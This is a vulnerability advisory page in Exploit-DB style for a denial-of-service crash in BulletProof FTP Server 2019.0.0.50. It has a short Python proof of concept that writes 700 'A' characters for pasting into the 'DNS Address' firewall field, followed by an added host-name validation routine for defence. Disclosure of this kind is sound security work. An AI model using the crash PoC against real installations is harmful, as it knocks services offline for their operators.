Vendor: BulletProof FTP Server
By: Victor Mondragón
CVSS: 7.8 (HIGH)
Denial of Service
CWE: 400
Product Name: BulletProof FTP Server
Affected Version From: 2019.0.0.50
Affected Version To: 2019.0.0.50
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 Single Language x64 / Windows 7 Service Pack 1 x64
2019

BulletProof FTP Server 2019.0.0.50 – ‘DNS Address’ Denial of Service (PoC)

A denial of service vulnerability exists in BulletProof FTP Server 2019.0.0.50 when a maliciously crafted DNS address is supplied. To trigger it, an attacker runs a Python script that generates the crafted DNS address, copies the content to the clipboard, enables the "DNS Address" option in the Firewall settings, pastes the content, and clicks the Test button. This causes the application to crash.

Mitigation:

Upgrade to the latest version of BulletProof FTP Server.
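
An added example, not from the original advisory or the vendor's code: a length and syntax check for a host name field such as "DNS Address", applied before any resolution is attempted. It assumes the field holds a host name and that the crash is triggered by the oversized input (the page does not state the root cause); `handle_test_button` and the resolver callback are hypothetical names.

```python
import re

# RFC 1035 / RFC 1123 limits for a host name in presentation form
MAX_NAME_LEN = 253
MAX_LABEL_LEN = 63
# Letters, digits and hyphens only; a label may not start or end with a hyphen
LABEL_RE = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?")


def validate_dns_address(value):
    """Return (ok, reason) for a user-supplied host name."""
    if not isinstance(value, str):
        return False, "not a string"
    name = value.strip()
    if name.endswith("."):  # tolerate a single trailing root dot
        name = name[:-1]
    if not name:
        return False, "empty"
    if len(name) > MAX_NAME_LEN:
        return False, "name longer than %d characters" % MAX_NAME_LEN
    for label in name.split("."):
        if not label:
            return False, "empty label"
        if len(label) > MAX_LABEL_LEN:
            return False, "label longer than %d characters" % MAX_LABEL_LEN
        # fullmatch avoids the '$'-before-newline pitfall of match()
        if not LABEL_RE.fullmatch(label):
            return False, "label has characters outside letters, digits, hyphen"
    return True, "ok"


def handle_test_button(field_text, resolver):
    """Hypothetical handler: call the resolver only after validation passes."""
    ok, reason = validate_dns_address(field_text)
    if not ok:
        return "rejected: " + reason
    return "resolved: " + resolver(field_text.strip())


if __name__ == "__main__":
    # Constructed inputs; the 700-character value has the same shape as the PoC file.
    samples = ["ftp.example.com", "A" * 700, "A" * 64 + ".example.com", "bad_host!"]
    for sample in samples:
        print(len(sample), handle_test_button(sample, lambda n: "203.0.113.10"))
```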

Exploit-DB raw data:

#Exploit Title: BulletProof FTP Server 2019.0.0.50 - 'DNS Address' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-18
#Vendor Homepage: http://bpftpserver.com/
#Software Link: http://bpftpserver.com/products/bpftpserver/windows/download
#Tested Version: 2019.0.0.50
#Tested on: Windows 10 Single Language x64 / Windows 7 Service Pack 1 x64

#Steps to produce the crash:
#1.- Run python code: BulletProof_DNS_Server_2019.0.0.50.py
#2.- Open bullet_dns.txt and copy content to clipboard
#3.- Open BulletProof FTP Server
#4.- Select "Settings" > "Protocols" > "FTP" > "Firewall"
#5.- Enable "DNS Address" and Paste Clipboard
#6.- Click on "Test"
#7.- Crashed

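# 700 "A" characters to paste into the "DNS Address" field
cod = "\x41" * 700

# Write the buffer to a text file so it can be copied to the clipboard
with open('bullet_dns.txt', 'w') as f:
    f.write(cod)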